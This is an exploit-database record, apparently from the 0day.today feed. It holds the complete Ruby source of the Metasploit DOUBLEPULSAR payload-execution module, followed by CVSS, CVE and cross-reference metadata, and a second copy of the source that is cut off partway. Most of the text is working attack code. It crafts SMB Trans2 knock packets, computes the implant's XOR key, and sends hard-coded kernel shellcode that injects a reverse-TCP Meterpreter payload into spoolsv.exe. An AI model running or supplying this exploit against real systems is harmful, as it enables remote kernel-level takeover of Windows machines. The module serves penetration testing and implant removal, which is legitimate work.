module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-21] #"}, "lastseen": "2021-10-20T22:23:49", "differentElements": ["sourceData"], "edition": 51}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1e163b311986855833cd4b6bf433d046", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-21T22:28:12", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:28:12", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-21T22:28:12", "rev": 2}}, 
"objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', 